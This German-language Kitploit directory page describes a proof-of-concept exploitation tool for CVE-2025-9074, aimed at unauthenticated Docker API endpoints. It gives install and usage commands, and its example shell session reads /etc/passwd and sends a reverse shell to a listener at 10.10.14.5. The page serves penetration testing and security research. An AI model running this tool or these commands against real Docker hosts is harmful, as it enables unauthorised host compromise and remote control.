Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
poc-2025-9074 — Docker API CVE-2025-9074 PoC (Proof-Of-Concept). Ein ausgefeiltes Exploitation-Framework für CVE-2025-9074, das unauthentifizierte Docker-API-Endpunkte mit einer integrierten interaktiven Befehlsshell angreift. | Kitploit
Tools/GitHubGitHub/xwpdx0/poc-2025-9074
Cloud-Infrastruktur-SicherheitPrivilege EscalationSchwachstellenscannerContainer-SicherheitExploit-FrameworksExploitationPost-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubxwpdx0/poc-2025-9074
41vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

poc-2025-9074

Docker API CVE-2025-9074 PoC (Proof-Of-Concept). Ein ausgefeiltes Exploitation-Framework für CVE-2025-9074, das unauthentifizierte Docker-API-Endpunkte mit einer integrierten interaktiven Befehlsshell angreift.

Repository anzeigen

CVE-2025-9074 | Docker API CVE-2025-9074 PoC (Proof-of-Concept)

Ein anspruchsvolles Exploitation-Framework für CVE-2025-9074, das nicht authentifizierte Docker-API-Endpunkte mit einer integrierten interaktiven Befehls-Shell angreift.

Language Platform License

Übersicht

Dieses Tool automatisiert die Ausnutzung von exponierten Docker-API-Instanzen ohne Authentifizierung und ermöglicht die vollständige Container-Erstellung und Befehlsausführung auf dem Zielhost. Das Tool bietet eine benutzerdefinierte interaktive Shell für nahtlose Post-Exploitation-Operationen.

Hinweis: Dies ist eine benutzerdefinierte PoC-Implementierung. Ich habe CVE-2025-9074 nicht selbst entdeckt.

Demonstration

Erste Ausnutzung

Ausnutzungsprozess

Automatisierte Schwachstellenerkennung, Image-Pull, Container-Erstellung und Initialisierung

Interaktive Befehlsausführung

Befehlsausführung

Post-Exploitation-Shell mit Befehlsausführungsfähigkeiten

Hauptfunktionen

  • Automatisierte Schwachstellenscans der Docker-API
  • Container-Bereitstellung mit Mounten des Host-Dateisystems
  • Interaktive Post-Exploitation-Shell
  • Schnittstelle zur Ausführung von Befehlen aus der Ferne
  • Reverse-Shell-Bereitstellungsmodul
  • Farbige Terminalausgabe für verbesserte Sichtbarkeit

Installation

  1. Klone das Repository
root@kitploit:~
git clone https://github.com/xwpdx0/poc-2025-9074
  1. Kompiliere den Code
root@kitploit:~
gcc poc.c -o poc-2025-9074

oder lade die Binärdatei von Releases herunter

Verwendung

root@kitploit:~
./poc-2025-9074

Standardziel

Ausführung gegen das Standardziel (127.0.0.1:2375):

root@kitploit:~
./poc-2025-9074

Benutzerdefiniertes Ziel

Gib einen benutzerdefinierten Docker-API-Endpunkt an:

Benutzerdefiniertes Ziel

Interaktive Shell

Nach erfolgreicher Ausnutzung bietet eine interaktive Shell die folgenden Befehle:

BefehlBeschreibung
cmd <befehl>Führt beliebige Befehle innerhalb des Containers aus

Anwendungsbeispiele

root@kitploit:~
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info

Schwachstellendetails

CVE-2025-9074 betrifft Docker-Instanzen mit exponierten API-Endpunkten, denen ordnungsgemäße Authentifizierungsmechanismen fehlen. Diese Fehlkonfiguration ermöglicht unbefugten Zugriff auf den Docker-Daemon und damit:

  • Erstellung beliebiger Container
  • Zugriff auf das Host-Dateisystem über Bind-Mounts
  • Möglichkeiten zur Privilegienausweitung
  • Remote-Codeausführung

Rechtlicher Hinweis

Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests.

  • Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche schriftliche Erlaubnis zum Testen haben
  • Unbefugter Zugriff auf Computersysteme ist illegal und strafbar
  • Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
  • Die Nutzer sind allein für die Einhaltung der geltenden Gesetze und Vorschriften verantwortlich

Autor

xwpd (@xwpdx0)

Lizenz

MIT-Lizenz – Weitere Details in der LICENSE-Datei


Nur für verantwortungsvolle Offenlegung und Sicherheitsforschung.

Tool herunterladen
revshell <ip> <port>
Stellt eine Reverse-Shell zum angegebenen Listener bereit
infoZeigt aktuelle Container- und Zielinformationen an
exitBeendet die interaktive Sitzung